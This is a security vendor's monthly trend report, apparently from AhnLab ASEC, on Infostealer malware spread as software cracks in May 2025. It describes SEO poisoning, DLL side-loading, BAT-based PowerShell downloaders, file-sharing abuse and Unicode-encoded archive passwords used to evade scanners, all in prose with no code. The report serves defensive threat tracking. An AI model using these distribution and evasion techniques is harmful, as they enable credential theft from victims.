May 2025 Infostealer Trend Report
This report provides statistics, trends, and case information on the distribution of Infostealer malware, including the distribution volume, methods, and disguises, based on the data collected and analyzed in May 2025. The following is a summary of the report.
1) Data Source and Collection Method
AhnLab SEcurity intelligence Center (ASEC) operates various systems to automatically collect and distribute malware strains in advance to respond to Infostealer malware. The collected malware strains are analyzed by the automatic analysis system to determine their maliciousness and C2 information. Relevant information is provided in real-time through the ATIP IOC service and can also be found in the related information on the ATIP File Analysis Information page.
AhnLab’s self-developed system
- Crack camouflage malware automatic collection system
- Email honeypot system
- Malware C2 automatic analysis system
ATIP Real-time IOC service
C2 and Malware Type Analysis
- File Analysis Information – Related Information – Contacted URLs
It is suggested that the statistics in this report be used to examine the overall distribution, camouflage techniques, and trends in the distribution of Infostealer malware.
2. Infostealers Disguised as Cracks
This is a statistic on Infostealer malware being distributed disguised as illegal programs such as cracks and keygens. SEO poisoning is used to ensure that the posts about the malware’s distribution are shown at the top in search results. AhnLab SEcurity intelligence Center (ASEC) has established a system that automatically collects malware distributed in this manner, analyzes C2 information, and blocks the malware’s C2 in real time. ASEC also provides relevant information through ATIP. In May, LummaC2, Vidar, StealC, Rhadamanthys, and Amadey Infostealers were distributed. Amadey was actively distributed in 2023 and has reappeared after a long hiatus.
Figure 1. Pages distributing malware
The chart below shows the quantity of malware distributed in this manner over the past year. The second legend shows the quantity of malware collected by AhnLab before related information was available on VirusTotal. This shows that AhnLab collected and responded to the majority of malware through its automatic collection system. Since the fourth quarter of last year, the quantity of malware distributed has been generally consistent.
Chart 1. Quantity of malware distributed annually
The threat actor is bypassing security measures by creating distribution posts on legitimate websites. They are utilizing popular forums, Q&A pages of specific companies, open forums, and comments. The following image shows an example of a distribution post uploaded to various communities.
Figure 2. A distribution post published on the legitimate Facebook site
Figure 3. A distribution post published on the legitimate website (Thangs)
In this manner, Infostealers are executed in two ways: being distributed in EXE format and using the DLL-SideLoading technique, which involves placing a legitimate EXE file and a malicious DLL file in the same folder so that when the legitimate EXE file is executed, the malicious DLL file is loaded. Of the malware that occurred in May, approximately 95.4% were of the EXE type and 4.6% were of the DLL-SideLoading type. The number of DLL-SideLoading samples has significantly decreased. DLL-SideLoading malware is created by modifying only a portion of a legitimate DLL file into malicious code, so it closely resembles the original file. As a result, many other security solutions may classify it as a legitimate file, making it necessary to be cautious.
Figure 4. Example of VirusTotal query result for DLL malware
Trend #1
At the end of May, a BAT script form of malware was distributed for about a week. The malware was distributed in two types: one where users downloaded the BAT malware directly from the download page, and another where the BAT malware was included in a compressed file. The BAT script is a command that uses PowerShell to download and execute malware from the C2. Initially, it was distributed in plain text, but various obfuscation techniques were added later. For more information, please refer to the AhnLab SEcurity intelligence Center (ASEC) Notes below.
- [AhnLab SEcurity intelligence Center (ASEC) Notes] Crack-Patched Infostealer Being Distributed in BAT Form
- https://atip.ahnlab.com/intelligence/view?id=be5008f5-1977-4a46-ba1b-7cd89063277d
Figure 5. Plain malware (left) and obfuscated malware (right)
Trend #2
Cases of malware distribution using the Wormhole service have been detected. Wormhole is a file-sharing service that allows users to host and distribute files without logging in. While it is convenient for distributing malware, the hosting period is limited to 24 hours and the number of downloads is limited to 100, restricting mass distribution. The threat actor is believed to have used the service to distribute malware for testing purposes for about a week, and it is currently not in use.
Figure 6. Distribution of malware using the Wormhole service
Trend #3
There are multiple samples where the compression password specified in the file name is represented in Unicode characters instead of the usual ASCII characters. The file in Figure 7 below appears to be “2025” to the naked eye, but its actual value in UTF-8 encoding is “f0 9d 9f ae f0 9d 9f ac f0 9d 9f ae f0 9d 9f b1”. This is deemed to be for the purpose of bypassing security devices or automation systems with password decompression features.
Figure 7. Sample of Unicode string password display
Figure 8. Sample of Unicode string password display (2)
For more information on statistics not covered in this summary, statistics on the decoyed target companies, statistics on the original file names, distribution statistics, product detection statistics, and information on Infostealers via phishing emails, please refer to the full ATIP report.
※ For more information, please refer to the attachment.
